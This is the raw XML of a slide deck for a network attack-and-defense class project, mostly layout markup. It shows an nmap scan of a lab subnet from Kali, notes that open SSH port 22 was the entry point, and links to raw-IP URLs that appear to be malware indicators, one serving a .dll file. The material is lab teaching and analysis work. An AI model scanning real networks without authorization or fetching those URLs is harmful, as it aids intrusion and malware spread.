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24377650" cy="13716000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lato Light" panose="020F0502020204030203"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Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId81"/>
      <p:boldItalic r:id="rId82"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId83"/>
      <p:bold r:id="rId84"/>
      <p:italic r:id="rId85"/>
      <p:boldItalic r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"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A34B-11DE-4668-9ADA-C4ED52D82525}">
  <a:tblStyle styleId="{6222A34B-11DE-4668-9ADA-C4ED52D825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7" d="100"/>
          <a:sy n="27" d="100"/>
        </p:scale>
        <p:origin x="666" y="84"/>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e828e0789_0_25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e828e0789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e828e0789_0_976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e828e0789_0_97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e828e0789_0_131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e828e0789_0_13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e828e0789_0_870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e828e0789_0_87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828e0789_0_342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828e0789_0_34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828e0789_0_448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828e0789_0_44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e828e0789_0_553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e828e0789_0_55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e828e0789_0_764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e828e0789_0_76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e828e0789_0_659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e828e0789_0_65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e828e0789_0_1106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e828e0789_0_110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e828e0789_0_17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e828e0789_0_17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ce828e0789_0_17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c31d79042_4_44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c31d79042_4_4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c31d79042_4_45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c31d79042_4_4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c31d79042_4_47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c31d79042_4_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e828e0789_0_1501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e828e0789_0_15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c31d79042_4_44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c31d79042_4_4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e828e0789_0_1238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ce828e0789_0_12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e828e0789_0_1369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e828e0789_0_136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e828e0789_0_1606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e828e0789_0_160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e828e0789_0_3592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e828e0789_0_359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e828e0789_0_37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e828e0789_0_370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ce828e0789_0_370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bda237455_4_25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e828e0789_0_3917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e828e0789_0_39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e828e0789_0_402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e828e0789_0_40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e828e0789_0_4129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e828e0789_0_412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bda237455_4_333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e828e0789_0_4234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e828e0789_0_423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28e0789_0_4445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28e0789_0_444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e828e0789_0_455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e828e0789_0_455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e828e0789_0_4973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e828e0789_0_497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e828e0789_0_5079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e828e0789_0_507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bda237455_4_2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e828e0789_0_5395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e828e0789_0_539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bda237455_0_134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bda237455_0_13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bda237455_4_33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bd883d690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bd13e9aa2_5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bd13e9aa2_5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bd13e9aa2_5_2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bd13e9aa2_5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e828e0789_0_5501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e828e0789_0_550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bd13e9aa2_1_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bd13e9aa2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bd13e9aa2_13_3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bd13e9aa2_13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bd13e9aa2_13_1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bd13e9aa2_13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bd13e9aa2_1_319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bd13e9aa2_1_3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e828e0789_0_3594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e828e0789_0_359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ce828e0789_0_18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ce828e0789_0_18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ce828e0789_0_18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ce828e0789_0_2164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ce828e0789_0_216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828e0789_0_1927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828e0789_0_192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ce828e0789_0_20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ce828e0789_0_205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ce828e0789_0_205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e828e0789_0_203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e828e0789_0_203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e828e0789_0_2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e828e0789_0_219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ce828e0789_0_219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e828e0789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e828e0789_0_229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ce828e0789_0_229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e828e0789_0_24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e828e0789_0_240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ce828e0789_0_240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e828e0789_0_26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e828e0789_0_26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ce828e0789_0_26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bda237455_0_2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bda237455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ce828e0789_0_27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ce828e0789_0_27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ce828e0789_0_27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ce828e0789_0_28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ce828e0789_0_28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ce828e0789_0_282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ce828e0789_0_34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ce828e0789_0_348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ce828e0789_0_348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ce828e0789_0_29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ce828e0789_0_293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ce828e0789_0_293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828e0789_0_3037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828e0789_0_30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e828e0789_0_30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e828e0789_0_306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ce828e0789_0_306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ce828e0789_0_31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ce828e0789_0_316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ce828e0789_0_316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ce828e0789_0_3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ce828e0789_0_327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ce828e0789_0_327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e828e0789_0_33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e828e0789_0_338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ce828e0789_0_338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ce828e0789_0_39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ce828e0789_0_39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ce828e0789_0_391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e828e0789_0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e828e078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cbd13e9aa2_5_4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cbd13e9aa2_5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e828e0789_0_38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e828e0789_0_38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ce828e0789_0_381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e828e0789_0_1712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e828e0789_0_17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831006" y="1985533"/>
            <a:ext cx="22715700" cy="54735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5" name="Google Shape;15;p2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="7557667"/>
            <a:ext cx="22715700" cy="21135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6" name="Google Shape;16;p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830984" y="2949667"/>
            <a:ext cx="22715700" cy="52359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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="8405933"/>
            <a:ext cx="22715700" cy="3468900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-533400" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-463550" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Google Shape;51;p11"/>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56" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="632102"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57" name="Google Shape;57;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3"/>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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Google Shape;60;p1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 name="Google Shape;62;p1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63" name="Google Shape;63;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 name="Google Shape;64;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 name="Google Shape;66;p1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7" name="Google Shape;67;p14"/>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8" name="Google Shape;68;p1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 name="Google Shape;69;p1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 name="Google Shape;70;p1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2" name="Google Shape;72;p14"/>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3" name="Google Shape;73;p14"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Google Shape;74;p1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75" name="Google Shape;75;p1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76" name="Google Shape;76;p1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77" name="Google Shape;77;p1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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731343"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5"/>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5"/>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86" name="Google Shape;86;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="177945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87" name="Google Shape;87;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3322133"/>
            <a:ext cx="17860800" cy="103935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8" name="Google Shape;88;p16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18811900" y="2427933"/>
            <a:ext cx="4836300" cy="10092900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9E8"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="487575" tIns="487575" rIns="487575" bIns="487575" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2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89" name="Google Shape;89;p16"/>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1" name="Google Shape;91;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92" name="Google Shape;92;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 name="Google Shape;93;p16"/>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 name="Google Shape;96;p1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97" name="Google Shape;97;p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 name="Google Shape;99;p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0" name="Google Shape;100;p1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1" name="Google Shape;101;p17"/>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0984" y="5735600"/>
            <a:ext cx="22715700" cy="2244900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="2437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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3073267"/>
            <a:ext cx="22715700" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t"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23" name="Google Shape;23;p4"/>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6" name="Google Shape;26;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83098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7" name="Google Shape;27;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288304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8" name="Google Shape;28;p5"/>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31" name="Google Shape;31;p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0984" y="1481600"/>
            <a:ext cx="7485900" cy="2015100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="24375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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3705600"/>
            <a:ext cx="7485900" cy="8478300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-431800">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
              <a:defRPr sz="32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35" name="Google Shape;35;p7"/>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06993" y="1200400"/>
            <a:ext cx="16976400" cy="10908900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr"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8" name="Google Shape;38;p8"/>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07816" y="3288467"/>
            <a:ext cx="10784400" cy="39528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42" name="Google Shape;42;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707816" y="7474867"/>
            <a:ext cx="10784400" cy="32937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 name="Google Shape;43;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13168570" y="1930867"/>
            <a:ext cx="10229400" cy="9853500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr"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44" name="Google Shape;44;p9"/>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830984" y="11281533"/>
            <a:ext cx="15992700" cy="1613700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" lvl="0" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="4800"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p10"/>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0984" y="1186733"/>
            <a:ext cx="22715700" cy="1527300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="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11" name="Google Shape;11;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830984" y="3073267"/>
            <a:ext cx="22715700" cy="9110400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="●"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="○"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-463550">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="3700"/>
              <a:buChar char="■"/>
              <a:defRPr sz="3700">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;12;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22587337" y="12435245"/>
            <a:ext cx="1462800" cy="1049700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="243750" tIns="243750" rIns="243750" bIns="243750" anchor="ctr" anchorCtr="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27.jp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ordpress.org/plugins/sucuri-scanner/"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detectportal.firefox.com/success.txt"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hyperlink" Target="http://www.iphonehacks.com/jailbreak-ios-13" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.assoc-amazon.com/s/ads.js" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mysocalledchaos.com/wp-content/upload/2018/02/Beauty.jp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hyperlink" Target="http://31.7.62.214/fakeurl.htm"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publicdomaintorrents.info/grabs/bettybooprythmonthereservationgrab.jpg"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jp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hyperlink" Target="http://205.185.125.104/files/june11.dll"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64.jpg"/></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b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Final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Attack, Defense &amp; Analysis of a Vulnerable Network</a:t>
            </a:r>
            <a:endParaRPr sz="6800"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By The Cyber Defenders</a:t>
            </a:r>
            <a:endParaRPr sz="6800" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="6800" dirty="0">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Alison Meehan</a:t>
            </a:r>
            <a:endParaRPr sz="6800" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;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a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p18"/>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“Open access to SSH 22”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;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188" name="Google Shape;188;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="115479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3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-431800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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We first scanned the network using nmap on Kali machine (192.168.1.90/24)</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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root@Kali:~# nmap 192.168.1.90/24</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="-431800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-431800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It enumerated the open ports and services of the listed machines on the network. Target one machine has port 22 open. This was the gateway way to exploit for an attack. </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
